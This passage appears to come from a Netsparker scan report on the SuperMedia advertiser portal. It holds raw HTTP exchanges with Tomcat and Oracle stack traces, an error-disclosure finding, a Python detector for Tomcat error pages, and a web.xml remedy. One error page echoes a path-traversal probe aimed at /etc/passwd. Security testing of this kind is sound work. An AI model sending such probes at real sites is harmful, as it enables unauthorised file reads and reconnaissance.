Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6548

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>

<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>

<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@3ccdf84f targetAction = com.idearc.ssa.web.spring.LoginActAction@e0d3cc7, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >

<!-- Header Start -->

<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">

<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>


<!-- Roll-over navigation menus -->


<!-- Header End -->

</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;../../../../../CANTBEHERE/../../../../../../etc/passwd&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >

<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer()..

Tomcat Exception Report Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing exception report data in the HTTP response.

Impact

An attacker can obtain information such as:
  • Tomcat version.
  • Physical file path of Tomcat files.
  • Information about the generated exception.
In the response below the report discloses the container version (Apache Tomcat/5.5.25), the exception and root-cause classes, the source file and line number of every stack frame, the name of the JSP that failed (accountsetup_jsp), the application's own package names (com.idearc.ssa.web.*) and the frameworks in the filter chain (Spring MVC, Acegi Security, SiteMesh). None of this is exploitable on its own, but it lets an attacker select version-specific attacks and map the application's internals without guessing.
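The following script shows what the scanner is flagging: it recognises Tomcat's default exception report in a raw HTTP response and pulls out the pieces listed above (container version, exception classes, source files, compiled JSP names and the application's own package names, separated from container and framework packages). It is an added example, not part of the Netsparker report or the target application. The embedded response is constructed for the example, abridged from the shape of the Tomcat 5.5 page, with the package com.example.ssa standing in for the real application's packages; the FRAMEWORK_PREFIXES list is an assumption about which packages count as third-party code.

```python
"""Recognise Apache Tomcat's default exception report in an HTTP response and
summarise what it leaks. Added example; not code from the report or the target."""
import html
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample (not the captured response): the shape of a Tomcat 5.5
# exception report, with com.example.ssa standing in for the application's packages.
SAMPLE_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><head><title>Apache Tomcat/5.5.25 - Error report</title></head><body>"
    "<h1>HTTP Status 500 - </h1><p><b>type</b> Exception report</p>"
    "<p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property "
    "'customerProfile' of bean class [com.example.ssa.web.AccountSetupFormWrapper] "
    "org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) "
    "com.example.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) "
    "org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148)</pre></p>"
    "<p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: "
    "Invalid property 'customerProfile' "
    "org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) "
    "org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) "
    "org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565)</pre></p>"
    "<h3>Apache Tomcat/5.5.25</h3></body></html>"
)

# Assumed list of container/framework packages; any other package in a trace is
# treated as the target's own code.
FRAMEWORK_PREFIXES = (
    "java.", "javax.", "org.apache.", "org.springframework.",
    "org.acegisecurity.", "com.opensymphony.",
)

TITLE_RE = re.compile(r"<title>Apache Tomcat/([\w.\-]+) - Error report</title>")
SECTION_RE = re.compile(r"<b>(exception|root cause)</b>\s*<pre>(.*?)</pre>", re.S)
# One stack frame: fully.qualified.Class.method(File.java:123); <init> is a constructor.
FRAME_RE = re.compile(r"([\w$.]+\.[\w$<>]+)\((\w+\.java):(\d+)\)")


def split_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP response into status line, lower-cased header map and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status, *header_lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def tomcat_version(body: str) -> Optional[str]:
    """Version from the error page title, or None if this is not a Tomcat report."""
    m = TITLE_RE.search(body)
    return m.group(1) if m else None


def stack_frames(pre_text: str) -> List[Tuple[str, str, int]]:
    """(qualified method, source file, line) for every frame in a <pre> block."""
    return [(m.group(1), m.group(2), int(m.group(3))) for m in FRAME_RE.finditer(pre_text)]


def package_of(qualified_method: str) -> str:
    """com.example.web.Filter.doFilter -> com.example.web"""
    return qualified_method.rsplit(".", 2)[0]


def summarize(raw: str) -> Dict[str, object]:
    """What an unauthenticated client learns from one Tomcat exception report."""
    status, _headers, body = split_response(raw)
    body = html.unescape(body)  # constructors arrive as &lt;init&gt;
    version = tomcat_version(body)
    is_report = version is not None and "Exception report" in body
    classes: Dict[str, Optional[str]] = {"exception": None, "root cause": None}
    app_packages: Set[str] = set()
    jsp_sources: Set[str] = set()
    frameworks: Set[str] = set()
    if is_report:
        for section, text in SECTION_RE.findall(body):
            classes[section] = text.split(":", 1)[0].strip()  # class before the message
            for method, source, _line in stack_frames(text):
                pkg = package_of(method)
                if source.endswith("_jsp.java"):
                    jsp_sources.add(source)  # compiled JSP name reveals the page
                elif pkg.startswith(FRAMEWORK_PREFIXES):
                    frameworks.add(".".join(pkg.split(".")[:2]))  # e.g. org.springframework
                else:
                    app_packages.add(pkg)
    return {
        "status": status,
        "is_tomcat_report": is_report,
        "tomcat_version": version,
        "exception_class": classes["exception"],
        "root_cause_class": classes["root cause"],
        "app_packages": app_packages,
        "jsp_sources": jsp_sources,
        "frameworks": frameworks,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_RESPONSE).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Run against the constructed sample it reports Tomcat 5.5.25, the JasperException and NullValueInNestedPathException classes, accountsetup_jsp.java as the failing JSP, com.example.ssa.web.filter as application code and org.apache, org.acegisecurity and org.springframework as frameworks in the request path. A response that returns a generic application error page with no Tomcat title is reported as not a Tomcat exception report, which is the state the remedy below should produce.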

Remedy

Add the following to the application's web.xml so that Tomcat serves a static custom page for HTTP 500 responses instead of its default exception report:
<error-page>
        <error-code>500</error-code>
        <location>/server_error.html</location>
</error-page>
The page named in location must itself be static and must not echo request data or exception details: the application's own "Processing Error" page in the earlier response on this page prints the rejected flow id verbatim, and its analytics script embeds the full exception message, so an error view that renders the exception only moves the leak from Tomcat's report into the application's page.

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Parameters

Parameter          Type   Value
_flowExecutionKey  GET    _cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) 
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) 
org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) 
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) 
org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>